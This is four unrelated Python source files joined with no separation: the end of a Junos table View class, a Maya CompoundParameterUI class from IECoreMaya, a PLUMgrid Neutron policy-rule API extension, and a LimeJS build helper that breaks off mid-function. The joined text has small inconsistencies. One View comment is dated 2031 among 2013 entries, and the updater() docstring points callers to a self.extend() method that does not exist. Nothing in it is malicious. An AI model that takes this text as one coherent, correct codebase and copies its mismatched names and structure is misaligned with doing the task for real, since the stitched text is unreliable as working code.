                # this catch-all is intentional.
                try:
                    keys.append(self.xml.xpath(i)[0].text.strip())
                except:
                    keys.append(None)
            return tuple(keys)

    # ALIAS key <=> name
    key = name

    @property
    def xml(self):
        """ returns the XML associated to the item """
        return self._xml

    # -------------------------------------------------------------------------
    # METHODS
    # -------------------------------------------------------------------------

    def keys(self):
        """ list of view keys, i.e. field names """
        return self.FIELDS.keys()

    def values(self):
        """ list of view values """
        return [getattr(self, field) for field in self.keys()]

    def items(self):
        """ list of tuple(key,value) """
        return zip(self.keys(), self.values())

    def _updater_instance(self, more):
        """ called from extend; copies class defs so only this instance is changed """
        if hasattr(more, 'fields'):
            self.FIELDS = deepcopy(self.__class__.FIELDS)
            self.FIELDS.update(more.fields.end)
        if hasattr(more, 'groups'):
            self.GROUPS = deepcopy(self.__class__.GROUPS)
            self.GROUPS.update(more.groups)

    def _updater_class(self, more):
        """ called from extend; mutates the shared class-level definitions """
        if hasattr(more, 'fields'):
            self.FIELDS.update(more.fields.end)
        if hasattr(more, 'groups'):
            self.GROUPS.update(more.groups)

    @contextmanager
    def updater(self, fields=True, groups=False, all=True, **kvargs):
        """
        provide the ability for subclassing objects to extend the
        definitions of the fields.  this is implemented as a context
        manager with the form called from the subclass constructor:

            with self.extend() as more:
                more.fields = <dict>
                more.groups = <dict>   # optional
        """
        # ---------------------------------------------------------------------
        # create a new object class so we can attach stuff to it arbitrarily.
        # then pass that object to the caller, yo!
        # ---------------------------------------------------------------------
        more = type('RunstatViewMore', (object,), {})()
        if fields is True:
            more.fields = ViewFields()

        # ---------------------------------------------------------------------
        # callback through context manager
        # ---------------------------------------------------------------------
        yield more
        # all=True updates the class itself; otherwise only this instance
        updater = self._updater_class if all is True else \
            self._updater_instance
        updater(more)

    def asview(self, view_cls):
        """ create a new View object for this item """
        return view_cls(self._table, self._xml)

    def refresh(self):
        """
        ~~~ EXPERIMENTAL ~~~
        refresh the data from the Junos device.  this only works if the
        table provides an "args_key", does not update the original table,
        just this specific view/item
        """
        warnings.warn("Experimental method: refresh")

        if self._table.can_refresh is not True:
            raise RuntimeError("table does not support this feature")

        # create a new table instance that gets only the specific named
        # value of this view
        tbl_xml = self._table._rpc_get(self.name)
        new_xml = tbl_xml.xpath(self._table.ITEM_XPATH)[0]
        self._init_xml(new_xml)
        return self

    def to_json(self):
        """
        :returns: JSON encoded string of entire View contents
        """
        return json.dumps(self, cls=TableViewJSONEncoder)

    # -------------------------------------------------------------------------
    # OVERLOADS
    # -------------------------------------------------------------------------

    def __repr__(self):
        """ returns the name of the View with the associate item name """
        return "%s:%s" % (self.__class__.__name__, self.name)

    def __getattr__(self, name):
        """ returns a view item value, called as :obj.name: """
        item = self.FIELDS.get(name)
        if item is None:
            raise ValueError("Unknown field: '%s'" % name)

        if 'table' in item:
            # if this is a sub-table, then return that now
            return item['table'](self.D, self._xml)

        # otherwise, not a sub-table, and handle the field
        astype = item.get('astype', str)
        if 'group' in item:
            # group-scoped field: resolve relative to the group's element;
            # silently yields None when the group element was absent
            if item['group'] in self._groups:
                found = self._groups[item['group']].xpath(item['xpath'])
            else:
                return
        else:
            found = self._xml.xpath(item['xpath'])

        len_found = len(found)

        if astype is bool:
            # handle the boolean flag case separately
            return bool(len_found)

        if not len_found:
            # even for the case of numbers, do not set the value.  we
            # want to detect "does not exist" vs. defaulting to 0
            # -- 2013-nov-19, JLS.
            return None

        try:
            # added exception handler to catch malformed xpath expressesion
            # -- 2013-nov-19, JLS.
            # added support to handle multiple xpath values, i.e. a list of
            # things that have the same xpath expression (common in configs)
            # -- 2031-dec-06, JLS
            # added support to use the element tag if the text is empty
            def _munch(x):
                # Python 2: coerce unicode text to ascii; Python 3: text is str.
                if sys.version < '3':
                    as_str = x if isinstance(x, str) else x.text
                    if isinstance(as_str, unicode):
                        as_str = as_str.encode('ascii', 'replace')
                else:
                    as_str = x if isinstance(x, str) else x.text
                if as_str is not None:
                    as_str = as_str.strip()
                if not as_str:
                    as_str = x.tag      # use 'not' to test for empty
                return astype(as_str)

            if 1 == len_found:
                return _munch(found[0])
            return [_munch(this) for this in found]
        except:
            # NOTE(review): bare except re-raised as RuntimeError hides the
            # original cause (e.g. a ValueError from astype) -- confirm.
            raise RuntimeError("Unable to handle field:'%s'" % name)

        # and if we are here, then we didn't handle the field.
        raise RuntimeError("Unable to handle field:'%s'" % name)

    def __getitem__(self, name):
        """
        allow the caller to extract field values using :obj['name']:
        the same way they would do :obj.name:
        """
        return getattr(self, name)
########################################################################## # # Copyright (c) 2010-2011, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Image Engine Design nor the names of any # other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
#
##########################################################################

from __future__ import with_statement

import traceback

import maya.cmds

import IECore
import IECoreMaya

## ParameterUI for IECore.CompoundParameter: hosts a collapsible frame
# containing one child ParameterUI per visible child parameter, with the
# collapsed state persisted in the parameter's userData.
class CompoundParameterUI( IECoreMaya.ParameterUI ) :

	# userData key under which the collapsed state is stored by default
	_collapsedUserDataKey = "aeCollapsed"

	## Supports the following keyword arguments :
	#
	# bool "withCompoundFrame"
	# May be specified as True to force the creation of a
	# frameLayout even when this parameter is the toplevel parameter
	# for the node.
	#
	# list "visibleOnly"
	# A list of strings specifying the full parameter paths for
	# parameters which should be displayed. Any parameters not in
	# this list will not be visible.
	#
	# bool "labelVisible"
	# If not None, specifies whether or not the parameter label is visible. This
	# is used by the ClassVectorParameterUI ChildUI class.
	def __init__( self, node, parameter, labelVisible=None, **kw ) :

		self.__childUIs = {}
		self.__headerCreated = False
		self.__kw = kw.copy()

		# track nesting level so child uis can pick smaller fonts/indents
		self.__kw["hierarchyDepth"] = self.__kw.get( "hierarchyDepth", -1 ) + 1

		originalParent = maya.cmds.setParent( query=True )

		collapsible = self.__parameterIsCollapsible( node, parameter )
		collapsed = self._retrieveCollapsedState( collapsible, parameter )

		# we always use a Collapsible ui to hold our children, and just hide
		# the header if we don't actually want to collapse it ever.

		self.__collapsible = IECoreMaya.Collapsible(

			# need to specify a label on creation or maya gets the size wrong.
			# we'll update the label below, once we can call the base class label() method.
			label = "mustSpecifySomething",
			labelFont = self._labelFont( self.__kw["hierarchyDepth"] ),
			labelIndent = self._labelIndent( self.__kw["hierarchyDepth"] ),
			labelVisible = labelVisible if labelVisible is not None else collapsible,
			collapsed = collapsed,
			expandCommand = self.__expand,
			preExpandCommand = self.__preExpand,
			collapseCommand = self.__collapse,

		)

		IECoreMaya.ParameterUI.__init__( self,

			node,
			parameter,
			# stealing someone else's top level ui for use as your own is really breaking the rules.
			# but we need to do it to reduce the nesting associated with making a new top level to put
			# the Collapsible class in, because otherwise maya 2010 will crash with deeply nested
			# hierarchies. we could stop doing this when we no longer need maya 2010 support.
			self.__collapsible._topLevelUI(),
			**kw

		)

		self.__collapsible.setLabel( self.label() )
		self.__collapsible.setAnnotation( self.description() )

		self.__columnLayout = maya.cmds.columnLayout(
			parent = self.__collapsible.frameLayout(),
			width = 381
		)

		# child uis are built lazily via __preExpand; force it when we start
		# out expanded, because maya won't invoke the preExpand callback then
		if not collapsed :
			self.__preExpand()

		maya.cmds.setParent( originalParent )

	def replace( self, node, parameter ) :

		IECoreMaya.ParameterUI.replace( self, node, parameter )

		if self.__parameterIsCollapsible() :
			collapsed = self._retrieveCollapsedState( self.getCollapsed() )
			self.setCollapsed( collapsed, **self.__kw )

		if len( self.__childUIs ) :
			# reuse existing child uis, rebinding each to the new node/parameter
			for pName in self.__childUIs.keys() :
				ui = self.__childUIs[pName]
				p = self.parameter[pName]
				ui.replace( node, p )
		else :
			# children were never built (we were collapsed); build them now
			# only if we're currently expanded
			if not self.getCollapsed() :
				with IECoreMaya.UITemplate( "attributeEditorTemplate" ) :
					self.__createChildUIs()

	## Gets the collapsed state for the frame holding the child parameter uis.
	def getCollapsed( self ) :

		return self.__collapsible.getCollapsed()

	## Sets the collapsed state for the frame holding the child parameter uis.
	# \param propagateToChildren How many levels of hierarchy to propagate
	# the new state to. If a Bool is passed, rather than an int, then
	# 'all' or 'none' is assumed, for backwards compatibility.
	def setCollapsed( self, collapsed, propagateToChildren=0, **kw ) :

		if type(propagateToChildren) == bool :
			propagateToChildren = 999 if propagateToChildren else 0

		if not collapsed :
			# maya only calls preexpand when the ui is expanded by user action,
			# not by a script - how annoying.
			self.__preExpand()

		if self.__parameterIsCollapsible() :
			self.__collapsible.setCollapsed( collapsed )
			self._storeCollapsedState( collapsed )

		if propagateToChildren > 0 :
			propagateToChildren = propagateToChildren - 1
			self.__propagateCollapsed( collapsed, propagateToChildren, **kw )

	# This will retrieve the collapsedState from the parameters userData. It uses the
	# default key if 'collapsedUserDataKey' was not provided in the UI constructor's **kw.
	def _retrieveCollapsedState( self, default=True, parameter=None ) :

		if parameter is None :
			parameter = self.parameter

		key = self.__kw.get( "collapsedUserDataKey", CompoundParameterUI._collapsedUserDataKey )
		if "UI" in parameter.userData() and key in parameter.userData()["UI"] :
			return parameter.userData()["UI"][ key ].value
		else :
			return default

	# This will store \param state in the parameters userData, under the default key,
	# unless 'collapsedUserDataKey' was provided in the UI constructor's **kw.
	def _storeCollapsedState( self, state ) :

		if "UI" not in self.parameter.userData() :
			self.parameter.userData()["UI"] = IECore.CompoundObject()

		key = self.__kw.get( "collapsedUserDataKey", CompoundParameterUI._collapsedUserDataKey )
		self.parameter.userData()["UI"][key] = IECore.BoolData( state )

	# Returns True if the ui should be collapsible for this parameter, False
	# otherwise.
	def __parameterIsCollapsible( self, node=None, parameter=None ) :

		if node is None :
			node = self.node()
		if parameter is None :
			parameter = self.parameter

		fnPH = IECoreMaya.FnParameterisedHolder( node )

		# the toplevel parameter of the node defaults to not-collapsible;
		# userData overrides win, and both the correct "collapsible" and the
		# misspelt "collapsable" keys are honoured (later lookup wins)
		collapsible = not parameter.isSame( fnPH.getParameterised()[0].parameters() )
		with IECore.IgnoredExceptions( KeyError ) :
			collapsible = parameter.userData()["UI"]["collapsible"].value
		with IECore.IgnoredExceptions( KeyError ) :
			collapsible = parameter.userData()["UI"]["collapsable"].value

		collapsible = self.__kw.get( "withCompoundFrame", False ) or collapsible

		return collapsible

	@staticmethod
	def _labelFont( hierarchyDepth ) :

		if hierarchyDepth == 2 :
			return "smallBoldLabelFont"
		elif hierarchyDepth >= 3 :
			return "tinyBoldLabelFont"
		else :
			return "boldLabelFont"

	@staticmethod
	def _labelIndent( hierarchyDepth ) :

		return 5 + ( 8 * max( 0, hierarchyDepth-1 ) )

	## May be implemented by derived classes to present some custom ui at the
	# top of the list of child parameters. Implementations should first call the
	# base class method and then perform their custom behaviour, placing ui elements
	# into the provided columnLayout.
	def _createHeader( self, columnLayout, **kw ) :

		draggable = False
		try:
			draggable = self.parameter.userData()['UI']['draggable'].value
		except :
			pass

		## \todo Figure out what this draggable stuff is all about and document it.
		# I think it's intended to allow parameters to be dragged and dropped onto
		# an IECoreMaya.ParameterPanel but I can't get that to work right now.
		if draggable :

			maya.cmds.rowLayout(
				numberOfColumns = 2,
				columnWidth2 = ( 361, 20 ),
				parent = columnLayout
			)

			maya.cmds.text( label = "" )

			dragIcon = maya.cmds.iconTextStaticLabel(
				image = "pick.xpm",
				height = 20
			)
			self.addDragCallback( dragIcon, **kw )

		self.__headerCreated = True

	## May be called by derived classes if for any reason the child parameter
	# uis are deemed invalid - for instance if the child parameters have changed.
	# The uis will then be rebuilt during the next call to replace().
	def _deleteChildParameterUIs( self ) :

		maya.cmds.control( self.__columnLayout, edit=True, manage=False )

		for ui in self.__childUIs.values() :
			maya.cmds.deleteUI( ui.layout() )

		self.__childUIs = {}

		maya.cmds.control( self.__columnLayout, edit=True, manage=True )

	def __expand( self ) :

		self._storeCollapsedState( False )

		modifiers = maya.cmds.getModifiers()

		if modifiers & 1 :
			# shift is held
			self.__propagateCollapsed( False, 999, lazy=True )
		elif modifiers & 8 :
			# alt is held
			depth = 1;
			with IECore.IgnoredExceptions( KeyError ) :
				depth = self.parameter.userData()["UI"]["autoExpandDepth"].value
			self.__propagateCollapsed( False, depth, lazy=True )

	def __collapse(self):

		self._storeCollapsedState( True )

		# \todo Store collapse state
		modifiers = maya.cmds.getModifiers()

		if modifiers & 1 :
			# shift is held
			self.__propagateCollapsed( True, 999 )
		elif modifiers & 8 :
			# alt is held
			depth = 1;
			with IECore.IgnoredExceptions( KeyError ) :
				depth = self.parameter.userData()["UI"]["autoExpandDepth"].value
			self.__propagateCollapsed( True, depth )

	def __preExpand( self ) :

		# this is the most common entry point into the ui
		# creation code, and unfortunately it's called from
		# a maya ui callback. maya appears to suppress all
		# exceptions which occur in such callbacks, so we
		# have to wrap with our own exception handling to
		# make sure any errors become visible.
		try :
			with IECoreMaya.UITemplate( "attributeEditorTemplate" ) :
				if not self.__headerCreated :
					self._createHeader( self.__columnLayout, **self.__kw )
				if not len( self.__childUIs ) :
					self.__createChildUIs()
		except :
			IECore.msg( IECore.Msg.Level.Error, "IECoreMaya.ParameterUI", traceback.format_exc() )

	def __propagateCollapsed( self, collapsed, propagateDepth=999, **kw ) :

		for ui in self.__childUIs.values() :
			if hasattr( ui, "setCollapsed" ) :
				ui.setCollapsed( collapsed, propagateDepth, **kw )

	def __createChildUIs( self ) :

		self.__kw['labelWithNodeName'] = False

		for pName in self.parameter.keys():

			p = self.parameter[pName]

			visible = True
			try:
				visible = p.userData()['UI']['visible'].value
			except:
				pass

			if 'visibleOnly' in self.__kw :

				fullChildName = self.__kw['longParameterName']
				if fullChildName :
					fullChildName += "."
				fullChildName += pName

				visible = fullChildName in self.__kw['visibleOnly']

				# a compound stays visible if any descendant path is listed
				if not visible and p.isInstanceOf( IECore.TypeId.CompoundParameter ) :

					for i in self.__kw['visibleOnly'] :
						if i.startswith( fullChildName + "." ) :
							visible = True
							break

			if visible:

				maya.cmds.setParent( self.__columnLayout )
				ui = IECoreMaya.ParameterUI.create( self.node(), p, **self.__kw )
				if ui:
					self.__childUIs[pName] = ui

IECoreMaya.ParameterUI.registerUI( IECore.TypeId.CompoundParameter, CompoundParameterUI )
# Copyright 2016 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import networking_plumgrid
from networking_plumgrid._i18n import _
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.api.v2 import base
from neutron import manager
from neutron_lib.api import validators
from neutron_lib import exceptions as nexceptions
from random import randint

PG_POLICY_RULE = 'policy_rule'
PG_POLICY_RULES = 'policy-rules'

extensions.append_api_extensions_path(
    networking_plumgrid.neutron.plugins.extensions.__path__)


class PolicyRuleInvalidPortRange(nexceptions.InvalidInput):
    message = _("Invalid port range specified '%(port)s'. Following format "
                "is supported e.g. '%(min)s-%(max)s'")


class NoPolicyRuleFound(nexceptions.NotFound):
    message = _("Policy Rule with id '%(id)s' does not exist.")


class NoPolicyGroupFound(nexceptions.NotFound):
    message = _("Policy Group with id '(%(id)s)' specified as "
                "%(policy_config)s does not exist.")


class InvalidPolicyGroupForPolicy(nexceptions.InvalidInput):
    message = _("Policy Group with id '%(id)s' and type '%(type)s' "
                "cannot be specified as '%(policy_config)s' for policy.")


class InvalidPolicyRuleConfig(nexceptions.InvalidInput):
    message = _("Policy Rule only supports source_epg, "
                "destination_epg and service_epg.")


def _raise_invalid_port_range(data):
    """Raise PolicyRuleInvalidPortRange with a random example range.

    The randomly generated '<min>-<max>' pair is only used to show the
    user an example of the expected format in the error message.
    """
    port_range_min = randint(1, 65535)
    port_range_max = randint(port_range_min, 65535)
    raise PolicyRuleInvalidPortRange(port=data,
                                     min=str(port_range_min),
                                     max=str(port_range_max))


def _validate_port_range(data, valid_values=None):
    """Validate a '<min>-<max>' port-range string.

    :param data: the attribute value; None/empty is accepted (attribute
        default is None, meaning "no range restriction").
    :param valid_values: unused; present to satisfy the validator contract.
    :raises PolicyRuleInvalidPortRange: when *data* is not two integers
        separated by '-', or the range is not 0 <= min <= max <= 65535.
    """
    if not data:
        return
    try:
        lower_bound, upper_bound = data.split('-')
        lower_bound_val = int(lower_bound)
        upper_bound_val = int(upper_bound)
    except (ValueError, TypeError):
        _raise_invalid_port_range(data)
    # BUG FIX: the original condition only raised when the bounds were out
    # of range AND min <= max, so inverted ranges like '10-5' and mixed
    # invalid ranges like '70000-5' were silently accepted.  Reject
    # everything that is not 0 <= min <= max <= 65535.
    if not (0 <= lower_bound_val <= upper_bound_val <= 65535):
        _raise_invalid_port_range(data)


def _validate_action_target(data, valid_values=None):
    """Validate the 'action_target' attribute.

    #TODO(muawiakhan):FIXME - no validation is performed yet.
    (Signature fixed: the original declared a stray 'self' parameter on a
    module-level validator, which received the attribute value; neutron
    invokes validators as plain functions with (data, constraint).)
    """
    return


validators.validators['type:validate_port_range'] = _validate_port_range
validators.validators['type:validate_action_target'] = _validate_action_target

ep_supported_protocols = ['any', 'tcp', 'udp', 'icmp']
ep_supported_actions = ['copy', 'allow']

RESOURCE_ATTRIBUTE_MAP = {
    'policy_rule': {
        'id': {'allow_post': False, 'allow_put': False,
               'validate': {'type:uuid': None},
               'is_visible': True, 'primary_key': True},
        'name': {'allow_post': True, 'allow_put': False,
                 'is_visible': True, 'default': ''},
        'src_grp': {'allow_post': True, 'allow_put': False,
                    'is_visible': True, 'default': None},
        'dst_grp': {'allow_post': True, 'allow_put': False,
                    'is_visible': True, 'default': None},
        'tag': {'allow_post': True, 'allow_put': False,
                'is_visible': True, 'default': None},
        'protocol': {'allow_post': True, 'allow_put': False,
                     'is_visible': True, 'default': 'any',
                     'validate': {'type:values': ep_supported_protocols}},
        'src_port_range': {'allow_post': True, 'allow_put': False,
                           'is_visible': True, 'default': None,
                           'validate': {'type:validate_port_range': None}},
        'dst_port_range': {'allow_post': True, 'allow_put': False,
                           'is_visible': True, 'default': None,
                           'validate': {'type:validate_port_range': None}},
        'action': {'allow_post': True, 'allow_put': False,
                   'is_visible': True, 'default': None,
                   'validate': {'type:values': ep_supported_actions}},
        'action_target': {'allow_post': True, 'allow_put': False,
                          'is_visible': True, 'default': None,
                          'validate': {'type:validate_action_target': None}},
        'tenant_id': {'allow_post': True, 'allow_put': False,
                      'required_by_policy': True,
                      'validate': {'type:string': attr.TENANT_ID_MAX_LEN},
                      'is_visible': True}
    }
}


class Policyrule(extensions.ExtensionDescriptor):
    """API extension descriptor for PLUMgrid policy rules."""

    @classmethod
    def get_name(cls):
        return "Policy Rule"

    @classmethod
    def get_alias(cls):
        return "policy-rule"

    @classmethod
    def get_description(cls):
        return "This API will be used to configure policy rules inside" \
               " policy groups from Neutron and map it in PLUMgrid."

    @classmethod
    def get_namespace(cls):
        return "http://docs.openstack.org/ext/policy_rule" \
               "/api/v2.0"

    @classmethod
    def get_updated(cls):
        return "2016-01-01T00:00:00-00:00"

    @classmethod
    def get_resources(cls):
        """Build and return the REST resource for the policy-rules collection."""
        exts = []
        plugin = manager.NeutronManager.get_plugin()
        resource_name = PG_POLICY_RULE
        collection_name = PG_POLICY_RULES
        params = RESOURCE_ATTRIBUTE_MAP.get(resource_name, dict())
        controller = base.create_resource(collection_name, resource_name,
                                          plugin, params)
        ex = extensions.ResourceExtension(collection_name, controller)
        exts.append(ex)
        return exts
#!/usr/bin/env python

"""Utilities for common tasks needed to use lime framework. """

import optparse
import subprocess
import logging
import sys
import os.path
import zipfile
import re
import shutil
import fileinput
import mimetypes
from os.path import join, splitext, split, exists
from shutil import copyfile
from datetime import datetime
import base64
import json

if sys.version_info[0]==3:
    from urllib.request import urlretrieve
else :
    from urllib import urlretrieve

basedir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
curdir = os.path.abspath('.')

closure_dir = os.path.join(basedir,'closure')
closure_deps_file = os.path.join(closure_dir,'closure/goog/deps.js')

box2d_dir = os.path.join(basedir,'box2d')

extdir = join(basedir,'bin/external')
compiler_path = os.path.join(extdir,'compiler.jar')
soy_path = os.path.join(extdir,'SoyToJsSrcCompiler.jar')

projects_path = join(basedir,'bin/projects')

# zipfile.extract & os.path.relpath missing in 2.5
if sys.version_info < (2,6):
    print("Error. Python 2.6+ is required")
    sys.exit(1)


def removeDupes(seq):
    """Return the unique (rstripped) members of seq. Not order preserving."""
    keys = {}
    for e in seq:
        keys[e.rstrip()] = 1
    return keys.keys()


def makeProjectPaths(add):
    """Rewrite the projects registry file, optionally adding one path.

    Drops entries whose directory no longer exists and de-duplicates.
    """
    lines = open(projects_path,'r').readlines()
    if len(add):
        lines.append(add)
    newlines = filter(lambda x: exists(join(basedir,x.rstrip())) and len(x.rstrip()),lines)
    newlines = removeDupes(newlines)
    f = open(projects_path,'w')
    f.write('\n'.join(newlines))
    f.close()


def rephook(a,b,c):
    """urlretrieve reporthook: print download progress as a percentage."""
    sys.stdout.write("\r%2d%%" % ((100*a*b)/c) )
    sys.stdout.flush()


def escapeSpace(s):
    """Backslash-escape spaces for use in a shell command line."""
    return s.replace(" ","\\ ")


def quoteSpace(s):
    """Wrap each space in single quotes for use in a shell command line."""
    return s.replace(" ","' '")


def checkDependencies():
    """Download/verify git, Closure Library, Box2D, compiler and Soy jars."""
    #Check git
    retcode = subprocess.Popen(subprocess.list2cmdline(["git","--version"]),
        stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True).wait()
    if retcode!=0:
        logging.error('Lime requires git. Get it from http://git-scm.com/download')
        sys.exit(1)

    #Closure Library
    if not (os.path.exists(closure_dir) and os.path.exists(closure_deps_file)):
        print ('Closure Library not found. Downloading to %s' % closure_dir)
        print ('Please wait...')
        retcode = subprocess.Popen(subprocess.list2cmdline(["git","clone","https://github.com/google/closure-library.git",closure_dir]),shell=True).wait()
        if(retcode!=0):
            print ('Failed to clone Closure Library via Git. Discontinuing.')
            sys.exit(1)
        # pin to a known-good revision
        retcode = subprocess.Popen(subprocess.list2cmdline(["git","checkout","161037749f1efee3142630bba5092709cb09f796"]),shell=True,cwd=closure_dir).wait()
        if(retcode!=0):
            print ('Failed to clone Closure Library via Git. Discontinuing.')
            sys.exit(1)

    #Box2D
    if not os.path.exists(box2d_dir):
        print ('Box2DJS not found. Downloading to %s' % box2d_dir)
        print ('Please wait...')
        retcode = subprocess.Popen(subprocess.list2cmdline(["git","clone","https://github.com/thinkpixellab/pl.git",box2d_dir]),shell=True).wait()
        if(retcode!=0):
            logging.error('Error while downloading Box2D. Discontinuing.')
            sys.exit(1)

    #External tools dir
    if not os.path.exists(extdir):
        os.mkdir(extdir)

    #Closure compiler
    if not os.path.exists(compiler_path):
        zip_path = os.path.join(extdir,'compiler.zip')
        print ('Downloading Closure Compiler: ')
        urlretrieve("http://closure-compiler.googlecode.com/files/compiler-20130411.zip",zip_path,rephook)
        print ('\nUnzipping...')
        zippedFile = zipfile.ZipFile(zip_path)
        zippedFile.extract('compiler.jar',extdir)
        zippedFile.close()
        print ('Cleanup')
        os.unlink(zip_path)
        os.rename(os.path.join(extdir,'compiler.jar'), compiler_path)

    #Closure Templates
    if not os.path.exists(soy_path):
        zip_path = os.path.join(extdir,'soy.zip')
        print ('Downloading Closure Templates(Soy):')
        urlretrieve("http://closure-templates.googlecode.com/files/closure-templates-for-javascript-latest.zip", zip_path,rephook)
        print ('\nUnzipping...')
        zippedFile = zipfile.ZipFile(zip_path)
        zippedFile.extract('SoyToJsSrcCompiler.jar',extdir)
        zippedFile.close()
        print ('Cleanup')
        os.unlink(zip_path)

    if not os.path.exists(projects_path):
        open(projects_path,'w').close()

    makeProjectPaths('')


def update():
    """Register the current directory as a project and regenerate deps.js."""
    reldir = os.path.relpath(curdir,basedir)
    if reldir!='.':
        makeProjectPaths(reldir)

    print ('Updating Closure deps file')

    paths = open(projects_path,'r').readlines()
    paths.append('lime\n')
    paths.append('box2d/src\n')
    opt = ' '.join(map(lambda x: '--root_with_prefix="'+quoteSpace(os.path.join(basedir,x.rstrip()))+'/ ../../../'+x.rstrip()+'/"',paths))
    call = 'python ' + escapeSpace(os.path.join(closure_dir,'closure/bin/build/depswriter.py'))+' --root_with_prefix="'+\
        quoteSpace(closure_dir)+'/ ../../" '+opt+' --output_file="'+closure_deps_file+'"'
    print (call)
    subprocess.call(call,shell=True)


def create(name):
    """Create a new project from the default template and register it."""
    path = os.path.join(basedir,name)
    if exists(path):
        logging.error('Directory already exists: %s',path)
        sys.exit(1)

    name = os.path.basename(path)
    proj = os.path.relpath(path,basedir)

    shutil.copytree(os.path.join(basedir,'lime/templates/default'),path)

    # substitute the project name into template file names and contents
    for root, dirs, files in os.walk(path):
        for fname in files:
            newname = fname.replace('__name__',name)
            if fname.find("__name__")!=-1:
                os.rename(os.path.join(root,fname),os.path.join(root,newname))
            for line in fileinput.FileInput(os.path.join(root,newname),inplace=1):
                line = line.replace('{name}',name)
                print(line.rstrip())

    print ('Created %s' % path)

    if proj!='.':
        makeProjectPaths(os.path.relpath(path,basedir))

    update()


def makeSoyJSFile(path,stringbuilder):
    """Compile one .soy template file to a .soy.js file next to it."""
    if path[-4:]=='.soy':
        call = "java -jar "+soy_path+" --cssHandlingScheme goog --shouldProvideRequireSoyNamespaces --outputPathFormat "+path+".js "
        if not stringbuilder:
            call+= "--codeStyle concat "
        call += path;
        print (call)
        subprocess.call(call,shell=True)


def genSoy(path):
    """Generate .soy/.soy.js assets for a file or all .soy files in a tree."""
    if not os.path.exists(path):
        logging.error('No such directory %s',path)
        exit(1)
    if os.path.isfile(path):
        mtype = mimetypes.guess_type(path)[0]
        fname = split(path)[1]
        if path[-4:]=='.soy':
            makeSoyJSFile(path,True)
        elif path[-5:]=='.json':
            # wrap JSON contents into a soy-style JS data module
            infile= open(path,'r')
            outfile = open(path+'.js','w')
            outfile.write('goog.provide(\'lime.ASSETS.'+fname+'\');\ngoog.require(\'soy\');\n\n'+ \
                'lime.ASSETS.'+fname+'.data = function(opt_data) { \nreturn JSON.parse("'+
                json.dumps(json.loads(infile.read()), separators=(',',':')).replace("\"", "\\\"")+'");\n}')
            infile.close()
            outfile.close()
        elif mtype and ['image','audio','video'].count(mtype.split('/')[0]):
            # BUG FIX (Python 3): read media files in binary mode and decode
            # the base64 output; b64encode() requires bytes and returns bytes.
            infile= open(path,'rb')
            outfile = open(path+'.soy','w')
            outfile.write('{namespace lime.ASSETS.'+fname+'}\n\n/**\n * Generated with "bin/lime.py gensoy filepath"\n */\n{template .data}\n{literal}')
            outfile.write('data:'+mtype+';base64,')
            outfile.write(base64.b64encode(infile.read()).decode('ascii'))
            outfile.write('{/literal}\n{/template}\n')
            infile.close()
            outfile.close()
            makeSoyJSFile(path+'.soy',False)
        else :
            # plain text: escape soy's {} delimiters, then wrap in a template
            outfile = open(path+'.soy','w')
            outfile.write('{namespace lime.ASSETS.'+fname+'}\n\n/**\n * Generated with "bin/lime.py gensoy filepath"\n */\n{template .data}\n')
            for line in fileinput.FileInput(path):
                line = line.replace('{','[[LB_POS]]')
                line = line.replace('}','[[RB_POS]]')
                line = line.replace('[[LB_POS]]','{lb}')
                line = line.replace('[[RB_POS]]','{rb}')
                outfile.write(line);
            outfile.write('\n{/template}\n')
            outfile.close()
            makeSoyJSFile(path+'.soy',False)
    else:
        for root,dirs,files in os.walk(path):
            for fname in files:
                if fname[-4:]=='.soy':
                    soypath = os.path.join(root,fname)
                    makeSoyJSFile(soypath,False)
    update()


def build(name,options):
    """Compile namespace *name* into a single JS file via closurebuilder."""
    dir_list = open(projects_path,'r').readlines()
    dir_list.append('lime')
    dir_list.append('box2d/src')
    dir_list.append('closure')

    opt = ' '.join(map(lambda x: '--root="'+os.path.join(basedir,x.rstrip())+'/"',dir_list))
    call = 'python ' + escapeSpace(os.path.join(closure_dir,'closure/bin/build/closurebuilder.py'))+' '+opt+' --namespace="'+name+'" '+\
        '-o compiled -c '+compiler_path;

    if options.advanced:
        call+=" -f --compilation_level=ADVANCED_OPTIMIZATIONS"

    if options.debug:
        call+=" -f --debug -f --formatting=PRETTY_PRINT"

    if options.externs_file:
        for i, opt in enumerate(options.externs_file):
            call+=" -f --externs="+opt

    outname = options.output
    if options.output[-3:] != '.js':
        outname += '.js'

    if options.map_file:
